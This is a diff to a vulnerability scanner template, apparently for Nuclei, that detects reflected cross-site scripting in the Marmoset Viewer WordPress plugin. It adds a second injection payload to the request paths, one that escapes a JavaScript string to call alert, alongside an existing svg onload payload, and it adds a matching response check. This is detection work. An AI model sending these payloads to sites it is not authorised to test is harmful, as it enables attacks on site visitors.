--- a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml
+++ b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml
@@ -11,16 +11,16 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>"
-
+      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
-
       - type: word
         words:
           - "</script><svg/onload=alert('{{randstr}}')>"
+          - "alert(/{{randstr}}/)"
           - "Marmoset Viewer"
         part: body
         condition: and
